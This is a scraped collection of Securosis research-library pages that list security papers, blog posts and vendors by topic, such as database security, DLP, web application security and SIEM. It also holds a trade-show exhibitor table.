* Implementing and Managing Patch and Configuration Management
* Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform
* Watching the Watchers: Guarding the Keys to the Kingdom (Privileged User Management)
* Security Management 2.0: Time to Replace Your SIEM?
* Security Benchmarking: Going Beyond Metrics
* React Faster and Better: New Approaches for Advanced Incident Response
* Monitoring up the Stack: Adding Value to SIEM
* Understanding and Selecting SIEM/Log Management
* The Business Justification for Data Security

==> Vendor List

http://securosis.com/feeds/research Company Name Exhibitor Type Booth Number Sub-category Category Website 3M Mobile Interactive Solutions Division Exhibitor 2740 Mobile Security Endpoint Security http://solutions.3m.com/wps/portal/3M/en_US/Meetings/Home/ ActivIdentity Exhibitor 1128 Authentication Identity and Access Management http://www.actividentity.com/ Advanced Product Design Exhibitor 340 Advantech Exhibitor 217 AFC Industries Exhibitor 235 Furniture Other http://www.afcindustries.com/ Agiliance Exhibitor 2351 Compliance Security Management and Compliance http://www.agiliance.com/ Akamai Technologies Silver Sponsor 2017 Content Delivery http://www.akamai.com Alert Enterprise Exhibitor 351 Compliance Security Management and Compliance http://www.alertenterprise.com/ Alert Logic Exhibitor 2529 IDS/IPS Network Security http://www.alertlogic.com/ AlgoSec Exhibitor 856 Firewalls Network Security http://www.algosec.com/en/index.php AlienVault Exhibitor 652 SIEM/Log Management Security Management and Compliance http://www.alienvault.com/ Alta Associates Inc. Exhibitor 850 Compliance Security Management and Compliance http://www.altaassociates.com/ AMAX Information Technologies Exhibitor 346 http://www.amaxit.com/ American Portwell Technology, Inc. Exhibitor 628 http://www.portwell.com/ Anakam, an Equifax Company Exhibitor 226 Authentication Identity and Access Management http://www.anakam.com/ Anne Arundel Community College Exhibitor 2728 Education Other http://www.aacc.edu/ Anonymizer, Inc. Exhibitor 2722 Content Security Network Security http://www.anonymizer.com/ Antiy Labs Partner Pavilion 1541 Endpoint Security http://www.antiy.net/ Anue Systems Inc. Exhibitor 2445 Application Testing Application Security http://www.anuesystems.com/ APCON Exhibitor 832 http://www.apcon.com/ Application Security, Inc. 
Exhibitor 639 Database Security, Vulnerability Assessment Data Security, Security Management and Compliance http://www.appsecinc.com/ AppRiver Exhibitor 1059 Managed Services Email/Web Security http://www.appriver.com/ Approva Exhibitor 428 Compliance Security Management and Compliance http://www.approva.net/ Araknos SRL Unipersonale Exhibitor 347 SIEM/Log Management Security Management and Compliance http://www.araknos.it/en/azienda/azienda.html ArcSight Exhibitor 931 SIEM/Log Management Security Management and Compliance http://www.arcsight.com/ Armorize Technologies Inc. Exhibitor 329 Web Application Assessment Application Security http://www.armorize.com/ Art of Defence GmbH Partner Pavilion 1350 http://www.artofdefence.com/ Art of Defence GmbH Exhibitor 342 Web App Firewalls Application Security http://www.artofdefence.com/ Arxan Technologies Exhibitor 328 Secure Development Application Security http://www.arxan.com/ Astaro Exhibitor 2251 Firewalls, Email Security Gateway, Web Security Gateway Network Security, Email/Web Security http://www.astaro.com/ AT&T Exhibitor 831 http://www.att.com/ atsec information security Partner Pavilion 1350 Compliance Security Management and Compliance http://www.atsec.com/ Authentify, Inc. Exhibitor 1029 Authentication Identity and Access Management http://www.authentify.com/ Authernative, Inc. Exhibitor 550 Authentication Identity and Access Management http://www.authernative.com/ Avenda Systems Exhibitor 318 NAC Network Security http://www.avendasys.com/ Axway Silver Sponsor 2225 http://www.axway.com/ BeCrypt Inc. Exhibitor 2129 Disk Encryption Endpoint Security http://www.becrypt.com/ Beijing LinkTrust Technologies Development Co.,Ltd. Partner Pavilion 1541 Perimeter Defense Network Security http://www.linktrust.com.cn/ Beijing Topsec Science and Technology Co.,Ltd Partner Pavilion 1541 Beijing Venustech Inc. 
Partner Pavilion 1541 Perimeter Defense Network Security http://english.venustech.com.cn/ Beijing Zhongguancun Overseas Science Park Exhibitor 1541 http://www.zgc.gov.cn/english/ BeyondTrust Corp. Exhibitor 945 Anti-Malware Endpoint Security http://www.beyondtrust.com/ Bit9, Inc. Exhibitor 2621 Anti-Malware Endpoint Security http://www.bit9.com/ Bivio Networks Exhibitor 2133 Content Security Network Security http://www.bivio.net/ Black Box Network Services Exhibitor 2550 http://www.blackbox.com/ BlockMaster AB Exhibitor 2425 Mobile Security Endpoint Security http://www.blockmastersecurity.com/ Blue Coat Systems, Inc. Gold Sponsor 1139 Threat Mgmt, Anti-Malware, Web Security Gateway Network Security, Email/Web Security http://www.bluecoat.com/ BluePoint Security Exhibitor 2559 Cloud Security Virtualization and Cloud http://www.bluepointsecurity.com/ Brainloop Inc. Partner Pavilion 1350 Access Management Data Security http://www.brainloop.com/ BreakingPoint Systems, Inc. Exhibitor 951 Monitoring Network Security http://www.breakingpointsystems.com/ BroadWeb Corporation Partner Pavilion 1541 Perimeter Defense Network Security http://www.broadweb.com/ Bsafe Information Systems Inc. Exhibitor 855 Compliance Security Management and Compliance http://www.bsafesolutions.com/ BSI Partner Pavilion 1344 http://www.bsigroup.com/ C4ISR Journal Exhibitor 2650 Publication Other http://www.c4isrjournal.com CA Technologies Platinum Sponsor 1533 DLP, SIEM/Log Management, Compliance Data Security, Security Management and Compliance http://ca.com/ Capella University Exhibitor 251 Education Other http://www.capella.edu/ Cavium Networks Exhibitor 528 http://www.caviumnetworks.com/ Hardware CCSO.com Exhibitor 2619 http://www.ccso.com/ Disassembler Celestix Networks Exhibitor 852 Perimeter Defense Network Security http://www.celestix.com/ Cenzic, Inc. 
Exhibitor 332 Application Testing, Application Assessment Application Security http://www.cenzic.com/ Check Point Software Technologies Exhibitor 2317 Firewalls, IDS/IPS, Remote Access, Disk Encryption Network Security, Endpoint Security http://www.checkpoint.com/ Cherry Exhibitor 755 http://www.cherrycorp.com/ Hardware China quality certification certificate authority Partner Pavilion 1541 Compliance Security Management and Compliance http://www.cqc.com.cn/english/ CipherOptics Exhibitor 1923 Encryption Data Security http://www.cipheroptics.com/ Cisco Global Platinum Sponsor 1717 Firewalls, Remote Access, Threat Mgmt, Email Security Gateway, Web Security Gateway, Managed Services Network Security, Email/Web Security http://www.cisco.com/ Cloud Security Alliance Exhibitor 2718 http://www.cloudsecurityalliance.org/ Comodo Group, Inc. Exhibitor 2439 Endpoint Defense Endpoint Security http://www.comodo.com/ CoreTrace Corporation Exhibitor 1963 Anti-Malware Endpoint Security http://www.coretrace.com/ CORISECIO GmbH Partner Pavilion 1350 http://www.corisecio.com/ Coverity Exhibitor 333 Secure Development Application Security http://www.coverity.com/ Critical Watch Exhibitor 950 Compliance Security Management and Compliance http://www.criticalwatch.com/ Cryptography Research, Inc. Exhibitor 2233 http://www.cryptography.com/ Secure dev hardware cv cryptovision GmbH Partner Pavilion 1350 Encryption Data Security http://www.cryptovision.com/ Cyber-Ark Software, Inc. Exhibitor 2045 Authentication Identity and Access Management http://www.cyber-ark.com/ Cybera Exhibitor 752 Compliance Security Management and Compliance http://www.cybera.com/ Cyberoam Exhibitor 723 Perimeter Defense Network Security http://www.cyberoam.com/ Damballa Exhibitor 433 Endpoint Defense Endpoint Security http://www.damballa.com/ Dasient, Inc. Exhibitor 554 Endpoint Defense Endpoint Security http://www.dasient.com/ Dataguise Inc. 
Exhibitor 645 Database Security Data Security http://www.dataguise.com/ Department of Homeland Security/ US-CERT Exhibitor 457 http://www.us-cert.gov/ DeviceLock Exhibitor 2228 Mobile Security

==> Welcome to Securosis Research

http://securosis.com/feeds/research Download the Coverage Map (PDF)
* About Our Research
* About the Research Library

About Our Research
--------------
Securosis is a new breed of IT research firm focusing on the broad information security and compliance markets. As opposed to relying on big sales forces and high pay walls, we publish our primary research for free on our blog. Yeah, we know, it’s different and scary. But it works. In terms of our primary research model, our focus is to help mid-market IT and security professionals successfully execute on their projects, by providing actionable information to accelerate their progress. It doesn’t mean our research isn’t relevant to large enterprises and government agencies. It just means our primary constituency is someone who wears a security hat as well as a number of other hats on a daily basis.
Each week, Securosis publishes a ton of research on what’s happening in the security business, all focused on keeping our readers connected and focused on what’s important, not on the noise. Our weekly research includes:
* Securosis FireStarter: Periodically Securosis holds an internal, no-holds-barred research meeting. Each analyst prepares a topic and the other analysts typically rip it to shreds. The end result is a thought generator that challenges our perspectives and demands further discussion. We publish the findings of that research to “stir the pot” a bit and get the echo chamber vibrating.
* Securosis Incite: Something we’ve adopted from Security Incite is a hard-hitting summary of the news happening in our industry. Each Wednesday we send out 7-8 links with analysis of what’s happening out there and why it’s important.
* Securosis Weekly Summary: Just in case you don’t have anything better to do over the weekend, on Friday we send out a list of things we’ve posted on the blog and also each analyst’s favorite outside post. This keeps you up to date on what we’ve been up to.
* Ad Hoc Posts: Yes, the art of blogging is far from dead. During the week, once or twice a day we post something of interest. It could be a more detailed treatment of an announcement, something that’s been bothering us, or part of our primary research (which is always posted to the blog first).
In case you are some kind of dinosaur and don’t use an RSS reader, you can sign up for email distribution of our blog posts. Sign up for the Daily Digest or the Weekly Summary.
For each of our coverage areas, we have a defined hierarchy of primary research documents we prepare to ensure deep coverage and actionable advice:
* Understanding and Selecting: This series of posts provides the backdrop for each security domain. The research takes a product category perspective and helps readers understand why and how they’d use certain technology, and what is important when evaluating products and offerings. As an example, check out our work on Understanding and Selecting a Database Activity Monitoring Solution.
* Building a [Topic] Program: The next level in our research is how to structure a security program to solve a specific problem. This is about more than just figuring out what product to buy; it covers the underlying processes and techniques required to address a specific problem. You can see our Building a Web Application Security Program for an example of this research.
* Project Quant: For a select few coverage areas, we go very deep and actually define very granular process maps and establish metrics to quantify those processes for an aspect of security. We do a public survey to make sure we nail the process map and publish the survey results when we get a statistically significant sample. Check out Project Quant for Patch Management to understand this research.
About the Research Library
Are you tired of having to hunt through screen after screen of crappy search results just to find the few bits of information you need? Or trawl through endless forums and unrelated blog entries just to educate yourself on a new topic? We are too… that’s why we created the Securosis Research Library. The Library is designed to be your first stop when researching a new topic. We’ve collected our best blog posts, white papers, and multimedia materials together in a structure designed to help you find what you need as quickly as possible. Unlike search results or a wiki, we’ve organized the material for each topic in the order we think it will be most useful, rather than by date or some other arbitrary sorting method. We don’t cover every security topic you could think of, but we’re constantly expanding into new areas and filling in coverage that’s lighter than we’d like. Where possible, for technology-related topics we include a list of Free/Open Source and commercial products. We try to keep these lists updated, but if you see something we are missing please email us so we can add it. This is just a list of what’s available in alphabetical order – we aren’t endorsing any particular products. We update the material in the Library on an ongoing basis, and each entry is dated with the last update. If you’d like to keep your own copy, just subscribe to the RSS feed. Since we update the date on each entry when we make changes, your RSS reader should keep a current, local copy of the entire library. Pretty cool, eh? We hope you find it useful, and please email us with any suggestions, errors, or omissions.

==> Endpoint Security

http://securosis.com/feeds/research Stand by for our endpoint security page.

==> Security Management

http://securosis.com/feeds/research Stand by for our security management page.

==> Network Security

http://securosis.com/feeds/research Stand by for our network security page.

==> Cloud and Virtualization

http://securosis.com/feeds/research This is one of the newest areas of our coverage, and although cloud computing and virtualization are distinct technologies, they are very closely related.

==> Compliance

http://securosis.com/feeds/research Papers and Posts
------------
This section covers compliance topics and several general security issues related to compliance with industry and governmental regulations. This is a new section for us, and while we have a ton of information on this topic, we will be evolving how we present the material over time. These articles are strategic in nature, but we will be adding videos and podcasts for hands-on guidance in the coming weeks.

General Coverage
------------
1. It Isn’t Risk Management If You Can’t Lose
2. Visa’s Data Field Encryption
3. Tokenization Will Become the Dominant Payment Transaction Architecture
4. Some Follow-Up Questions for Bob Russo, General Manager of the PCI Council
5. We Know How Breaches Happen
6. New Details, and Lessons, on Heartland Breach
7. Heartland Hackers Caught; Answers and Questions
8. An Open Letter to Robert Carr, CEO of Heartland Payment Systems

Presentations
---------
* Presentation on Tokenization Guidance for PCI.
* Presentation on Data Breaches and Encryption.
* Presentation on Data Protection in the Enterprise. This is a corporate overview.
* Presentation on Encrypting Mobile Data for the Enterprise.

Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Please email info@securosis.com if you have any additions or corrections.

==> Database Security

http://securosis.com/feeds/research Database Security is one of the broader topics that Securosis covers. Database servers are highly complex systems, storing, organizing, and managing data for a wide array of applications. Most mid-sized firms have dozens of them, some embedded in desktop applications, while others serve core systems such as web commerce, financials, manufacturing, and inventory management. A Fortune 100 company may have thousands. To address the wide range of offerings and uses, we will cover database security from two different angles. The first is the security of the application itself, and the second is the use and security of the data within the database. Database Vulnerability Assessment (VA), access control & user management, and patch management are all areas where preventative security measures can be applied to a database system. For securing the data itself, we include such topics as Database Activity Monitoring (DAM), auditing, data obfuscation/masking, and database encryption. Technologies like database auditing can be used for either, but we include them in the latter category because they provide a transactional view of database usage. We also include some of the database programming guidelines that can help protect databases from SQL injection and other attacks against application logic.

Papers and Posts
------------
If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and comments.)
1. Understanding and Selecting a Database Security Platform is our new comprehensive database security paper.
2. Our Database Activity Monitoring research paper remains a reader favorite and can be downloaded here: “Understanding and Selecting a Database Activity Monitoring Solution” white paper.
3. Understanding and Selecting a Database Assessment Solution is now available. We are very happy with this paper. We have even been told by database assessment vendors that their product teams learned some tips from this paper, and we think you will too.
4. Our Understanding and Selecting a Database Encryption or Tokenization Solution paper is available.
5. Database Audit Events is a comprehensive list of database events available through native database auditing techniques.
6. Many supporting posts on Database Encryption: Application vs. Database Encryption and Database Encryption: Fact vs. Fiction, Format and Datatype Preserving Encryption, An Introduction to Database Encryption, Database Encryption Misconceptions, Media encryption options for databases, and threat vectors to consider when encrypting data.
7. The 5 Laws of Data Masking.

Database Security Patch Coverage
1. Oracle Critical Patch Update, July 2009.

General Coverage
------------
1. SQL Injection Prevention
2. Database Audit Performance in this Friday Summary introduction
3. Database Encryption Benchmarking
4. Three Database Roles: Programmer, DBA, Architect
5. Database Security: The Other First Steps
6. Sentrigo and MS SQL Server Vulnerability.
7. Amazon’s SimpleDB.
8. Information on Weak Database Password Checkers.
9. Database Connections and Trust, and databases are not typically set up to validate incoming connections against SQL injection and misused credentials, and this post on recommending Stored Procedures to address SQL Injection attacks
10. Separation of Duties and Functions through roles and programmatic elements, and putting some of the web application code back into the database.
11. Native database primary key generation to avoid data leakage and inference problems, and additional comments on Inference Attacks.
12. Your Top 5 Database Security Resolutions.
13. Posts on separation of duties: Who “Owns” Database Security, and the follow-up: DBAs should NOT own DAM & Database Security.
14. A look at general threats around using External Database Procedures and variants in relational databases.
15. Database Audit Events.
16. Database Security Mass-Market Update and Friday Summary - May 29, 2009
17. Database Patches, Ad Nauseum
18. Acquisitions and Strategy
19. Comments on Oracle’s Acquisition of Sun
20. Oracle CPU for April 2009
21. Netezza buys Tizor
22. More Configuration and Assessment Options. Discusses recent Oracle and Tenable advancements.
23. Policies and Security Products applies to database security as well as other product lines.
24. Oracle Security Update for January 2009.
25. Responding to the SQL Server Zero Day: Security Advisory 961040 includes some recommendations and workarounds.
26. Will Database Security Vendors Disappear? and Rich’s follow-on Database Security Market Challenges considerations for this market segment.
27. Behavioral Monitoring for database security.
28. NitroSecurity acquired RippleTech.
29. Database Monitoring is as big or bigger than DLP.

Presentations
---------
* Rich’s presentation on Understanding and Selecting a Database Activity Monitoring Solution. (PDF)
* Oracle Database Security in a Down Economy. (PDF)

Podcasts, Webcasts and Multimedia
None at this time.

Vendors/Tools
---------
The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.
Database Security Platforms
* Application Security Inc. (DBProtect)
* Fortinet
* GreenSQL
* IBM (Guardium)
* Imperva (SecureSphere)
* McAfee (Sentrigo, Nitro)
* Oracle (Secerno)
Database Vulnerability Assessment
* Application Security Inc. (AppDetective, DBProtect)
* Fortinet (IPLocks)
* IBM (Guardium)
* Imperva (DAS, Scuba)
* McAfee (Sentrigo)
* Oracle (mValent, Config. Packs)
* Qualys
* Tenable Network Security (Nessus)
* Next Generation Security Software NGS (Squirrel)
Database Encryption
* NetLib
* Oracle (TDE, API)
* Protegrity
* Prime Factors
* Relational Wizards
* RSA (Valyd)
* SafeNet (Ingrian)
* Sybase
* Thales (aka nCipher)
* Trustwave (Vericept)
* Voltage
Note that some of the vendors listed provide transparent disk encryption or application layer encryption that can be applied to database files or content.
Database Auditing
* GreenSQL
* Oracle (Audit Vault)
* SoftTree Technologies (DB Audit Expert)
* Quest (InTrust for DB)
Note that all DAM vendors provide auditing to one degree or another. This section is to designate specific products that provide database auditing, are not part of a DAM solution, and are not built into a database platform as a standard component.
Database Masking
* Axis Technology
* Camouflage
* dataguise
* Embarcadero
* Grid-Tools
* GreenSQL
* Hexaware/Akiva
* IBM (Optim/Princeton Softech)
* Informatica (ETL + Applimation)
* MENTiS Software
* Voltage (ETL + Dynamic)
Note that there are several vendors who offer format preserving encryption and tokenization, such as NuBridges, Prime Factors, Protegrity and Voltage, which also provide some masking capabilities.
Database Vendors
* IBM
* Oracle (Oracle, MySQL)
* Sybase
* Teradata
* Apache (Derby)
* PostgreSQL (Postgres)
* Ingres (Open Ingres)
There are dozens of vendors, both big and small, who offer databases, many with specific competitive advantages. We aren’t even attempting to be comprehensive, and specifically ignored any without widespread mainstream adoption. There are also dozens more open source databases with small numbers of deployments, perhaps primarily embedded in applications or backing non-commercial web applications.

==> Web Application Security

http://securosis.com/feeds/research

Here we focus on security specifically for web applications, as opposed to traditional corporate or enterprise applications. Our research pages on general application security should be used in tandem with this one, but this section focuses on the unique issues of web application security.

By our definition, Web Application Security is a super-set of traditional application security. Why? Because more often than not, web applications are backed by enterprise applications. They have all of the same problems, along with a handful of new security issues that are specific to offering distributed programs and functions across the Internet. For example, web applications offer features and functions to users outside the corporate network, so they cannot make any assumptions about the security of the network transmission nor the intentions of the user. They run on top of a complex conglomeration of services, consist primarily of custom code, produce dynamic content, and provide their UI entirely through a browser.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)

1. The most important piece of work we’ve published on Web Application Security is Building a Web Application Security Program. For those of you who followed along with the blog series, this is a compilation of that content, but it’s been updated to reflect all the comments we received, with additional research, and the entire report was professionally edited. The original blog series can be found here (Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7, and Part 8), as well as a couple of points we forgot to mention.
2. Rich’s post on How the Cloud Destroys Everything that I Love (About Web App Security).
3. The Risks of Trusting Content.
4. Web Application Security: We Need Web Application Firewalls to Work. Better.

General Coverage
------------

1. XML Security Overview
2. It’s Thursday the 13th—Update Adobe Flash Day
3. Heartland Hackers Caught; Answers and Questions
4. Using a Mac? Turn Off Java in Your Browser. We’re All Gonna Get Hacked is about the browser, not the app, but we’ll cross reference here.
5. There Are No Trusted Sites: Security Edition
6. Click-jacking Details, Analysis, and Advice.
7. Comments on “Containing Conficker”, a brief analysis of the Honeynet Project’s Know Your Enemy paper, an examination of how the Conficker worm attacks and behaves in general.
8. WAF vs. Secure Code vs. Dead Fish.
9. Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development.

Presentations
---------

* Our presentation on Building A Web Application Security Program. This was presented as supplementary material to the white paper of the same name.
* Presentation on Integrating Penetration Testing Into a Web Application Vulnerability Assessment Program. (PDF)

Podcasts, Webcasts and Multimedia

We do not currently have any multimedia for this topic.

Vendors/Tools
---------

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Remember that web application security is over and above the standard application security practices and technology, and these should be considered alongside other tools. We strongly encourage you to learn about the specifics of subcategories in the navigation menu.

Web Application Assessment
* Cenzic
* HP
* Secure Works
* WhiteHat Security

Penetration Testing
* AppLabs
* Bonsai
* CGISecurity
* Core Security Technologies
* McAfee (Foundstone)
* Plynt
* Rvasi
* WindowSecurity.com

Static Source Code Review
* Aspect Security
* Cigital
* Fortify
* IBM
* Ounce
* Veracode

Dynamic Source Code Review
* Coverity
* Ounce
* Veracode

Web Application Firewalls
* armorlogic
* ArtofDefense Hyperguard
* Barracuda Networks
* Breach
* Cisco
* F5
* Fortify
* Fortinet
* Imperva
* Protegrity

Monitoring
(All WAF vendors can monitor as well.)

Education & Training
* SANS Institute
* SAIC

Most regional ISSA and ISACA chapters can provide assistance as well.

==> Web, Email, and Data Portal Security

http://securosis.com/feeds/research

This research page covers web filtering as well as email security and anti-spam options. The email security market, like the web gateway market, is one of the most saturated and commoditized in the security industry. As with firewalls and anti-virus (on Windows), it is essentially impossible to do business without these tools. And to no one’s surprise we see continued convergence of these threat protection products; in some cases, it’s merely mergers and acquisitions to provide two separate products from the same vendor, but in other cases we see combined solutions – often in an attempt to displace point products. As many of the site-managed solutions also offer gateway and secure data exchange services, we will cover that here as well.

The intended audience for this page is those interested in security products for their business, to keep their users’ inboxes free of spam, and ensure Internet browsing stays within company policy. In the past we would just have said ‘bleep’, as that is why many of these platforms are purchased. In reality there are many other security and compliance uses for these technologies, which are at least as important.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)

1. Barracuda Networks Acquires Purewire
2. McAfee Acquires MX Logic
3. The Symantec acquisition of MessageLabs demonstrates that the battle for this fully commoditized market is not over.
4. Marshal8e6 Buys Avinti, and how the smaller vendors need to innovate and re-position their technologies to compete.

General Coverage
------------

1. The First Phishing Email I Almost Fell For
2. I Heart Creative Spam
3. Spam Levels and Anti-Spam SaaS.
4. Hackers 1, Marketing 0.

Presentations
---------

PDF versions of presentations (when available) may also be useful, although they don’t include any audio (for any audio/video, please see the next section).

Podcasts, Webcasts and Multimedia

We do not currently have any multimedia for this topic.

Vendors/Tools
---------

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email if you have any additions or corrections.

Vendors
* Aladdin
* Astaro
* Axway (Tumbleweed)
* Barracuda Networks
* Cisco (Ironport)
* Clearswift (MIMESweeper)
* Cloudmark
* CommTouch
* Google (Postini)
* Marshal8e6 (Mail Marshal + 8e6 Technologies)
* McAfee (IronMail, WebWasher, Secure Computing, CipherTrust)
* Proofpoint
* SonicWall (MailFrontier)
* Symantec (BrightMail and MessageLabs)
* WebSense

==> Research: Data Loss Prevention

http://securosis.com/feeds/research

We’ve probably written more about Data Loss Prevention than any other single technology. Actually, we prefer to call it Content Monitoring and Protection (CMP), but when we use that only about 3 people know what we’re talking about. We define CMP/DLP as:

Products that, based on central policies, identify, monitor, and protect data at rest, in motion, and in use through deep content analysis.

We use a pretty narrow definition to keep things clear – CMP/DLP is a defined product category, not some general definition for anything that protects data. Encryption, DRM, portable device control, and all the other things that call themselves DLP can help with data loss, but aren’t DLP. We think using a big bucket like that only confuses people. The best way to tell if something is DLP is to focus on the content awareness/analysis. If it only uses keywords or basic regular expressions, it isn’t really DLP.

Now why should you care about DLP? Is it just another over-hyped technology? Nope – we consider it to be one of the most significant security technologies to emerge over the past few years. By adding content and context awareness, we can now protect information based on what it is, as opposed to where it’s stored or some silly label someone slapped on it as metadata. CMP tools are also expanding their understanding of business context, not just the data itself, so we can apply intelligent policies that reflect business processes, while only interfering with said processes when there is a policy violation. CMP helps us find our sensitive information, watch how it’s being used, and then protect it. It’s far from perfect, but it’s still good enough that we recommend it, and we’d use it ourselves if we didn’t just give away all of our stuff for free.

We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it was added to help you find changes more easily.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all of the public comments as well.)

1. The most important piece of work we’ve published on CMP/DLP is our white paper, [Understanding and Selecting a Data Loss Prevention Solution](/research/publication/report-data-loss-prevention-whitepaper/). This report covers all the basics – features, architectures, use cases, and a recommended selection process with testing criteria. It was originally released as a series of blog posts: part 1 (introduction), part 2 (content awareness), part 3 (data-in-motion), part 4 (data-at-rest), part 5 (data-in-use/endpoint), part 6 (central administration), and part 7 (selection process). This is really the place to start if you need to learn about DLP.
2. I also wrote a feature for Information Security Magazine that covers similar material, but is much more condensed.
3. We also released a paper on Best Practices for DLP Content Discovery. This covers all the important issues when using DLP for data at rest. It was also a 6 part series: part 1, part 2, part 3, part 4, part 5, part 6 (use cases).
4. The third paper in our CMP/DLP series is dedicated to Best Practices for Endpoint DLP. As always, available in a series of blog posts: part 1, part 2, part 3, part 4, part 5, part 6 (use cases).
5. An early article on DLP as a feature vs. a full solution: DLP Is A Feature, CMF (Or Whatever We’ll Call It) Is A Solution.
6. A discussion on the evolution of CMP: DLP/ILP/Extrusion Prevention < CMF < CMP < SILM: A Short Evolution of Data Loss Prevention.
7. A short piece I did for Network World on DLP, and why it’s worth looking at now.
8. I’m a big proponent of full DLP solutions – this explains why: Data Protection Isn’t A Network Security Or Endpoint Problem.
9. The dirty little secret of DLP.
10. Data protection developments are running along parallel paths – one for productivity applications and communications (CMP/DLP), and the other in the data center (ADMP). Our definitions of DLP and ADMP.
11. Then a post on how those two worlds will connect.
12. A Network World article I wrote on pitfalls of DLP.
13. A look at the differences between DLP, content classification, and e-discovery.
14. You can also use DLP to help prevent malicious outbound connections from sophisticated attackers.
15. In Quick Wins with Data Loss Prevention we cut through the complexity and provide a process for getting immediate value out of your DLP investment, while still setting yourself up for the long term.

Presentations
---------

Presentation on Understanding and Selecting a Data Loss Prevention System. This is a companion to the DLP White Paper.

Podcasts, Webcasts and Multimedia

We do not currently have any multimedia for this topic.

Vendors/Tools
---------

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Note that many other products include “DLP light” features, such as basic keyword or regex matching. We are only including dedicated DLP solutions here.

Full Suite DLP
* CA (Orchestria)
* Code Green Networks
* EMC/RSA (Tablus)
* GTB Technologies
* McAfee (Reconnex)
* Symantec (Vontu)
* Vericept
* Websense (PortAuthority)
* Workshare

Network-only tools
* Clearswift
* Fidelis Security Systems
* Palisade Systems
* Proofpoint

Endpoint-only tools
* NextSentry
* Trend Micro (Provilla)
* Verdasys

==> Application Security

http://securosis.com/feeds/research

This section of the research library is dedicated to application security in its many forms. On this page we cover the basic topics, such as Access Control, Monitoring & IDS, SIM, SEM, and Log Management. For other specialized fields within application security, such as web application security and secure software development practices, we provide dedicated subsections. On the navigation bar you will see that we already have a few pages for specific coverage areas. We will continue to fill out our application security offerings, and provide additional specific coverage areas over time. Feel free to make a request if you have something in this area you are interested in seeing.

Papers and Posts
------------

* Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development.
* How Common Applications Are (Now) the Weakest Link.
* Comments on “Containing Conficker” considers some of the challenges most application developers are up against.
* Immutable Log technologies help with auditing and event trail verification.
* For application security, the implementation and management of a policy set is a key factor in the cost and effectiveness of just about any security product (and, frankly, your happiness as well).
* Separation of Duties, Concept of Least Privilege, and other role-based user security measures.
* The Perils of the Insider Threat.
* PDF Security Pain, and stuff to think about on all script-enabled applications.
* A very cool way of reverse engineering applications and content with Visual Forensic Analysis tools.

Presentations
---------

* Security + Agile = FAIL. Live presentation is here.
* This presentation covers Major Enterprise Application Security.

Podcasts, Webcasts and Multimedia

==> SIM, SIEM, and Log Management

http://securosis.com/feeds/research

This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)

1. SIEM, Today and Tomorrow is a look back at some of the evolutionary struggles of SIM/SEM, and what is happening with the market space today.
2. LogLogic Acquires Exaprotect.
3. It seems like every other post we mention SIM/SEM and Log Management. We get a briefing from a vendor nearly every week, and we both know and cover this space. Creating this research page, we realized just how few posts we have written that are dedicated to it. We will provide more in the coming weeks.

General Coverage
------------

1. Policies and Security Products, covering the expense of policy creation and maintenance.

Presentations
---------

1. Adrian’s presentation on Meeting Compliance with SIM, SEM and Log Management provides an in-depth discussion of using SIM/SEM and Log Management products for meeting compliance, and offers practical tips in dealing with technical and process challenges.

Podcasts, Webcasts and Multimedia

We do not currently have any multimedia for this topic.

Vendors/Tools
---------

The following is just an alphabetized and categorized list of vendors and products we are aware of in this area (including free tools). It does not imply endorsement, and is meant to assist you, should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.

Vendors
* ArcSight
* CA
* CISCO MARS
* eIQ
* ExaProtect
* IBM
* Intellitactics
* LogLogic
* LogRhythm
* NetForensics
* NetIQ
* NitroSecurity
* Quest InTrust
* RSA EnVision
* Sensage
* Symantec SSIM
* Tenable
* TriGeo
* Q1 Labs

==> Project Quant

http://securosis.com/feeds/research

Project Quant is a special research project to develop a metrics model for measuring the costs and effectiveness of patch management. This page includes the research deliverables associated with the project. All of the draft materials and public feedback are available on the project Blog and Forums:

* The Project Quant Blog and Landing Page
* The Project Quant Forums

Published project documents include:

* Version 1.0 of the Project Quant Report
* The Project Quant Survey Results Analysis

Here are the raw survey results from the project’s Open Patch Management Survey:

* Project Quant Raw Survey Results, September 2009. (Zip file includes summary results in Excel format, and full raw results in Excel and CSV formats.)
* The survey is still active, and you can participate here.

==> ADMP: Application and Database Monitoring and Protection

http://securosis.com/feeds/research

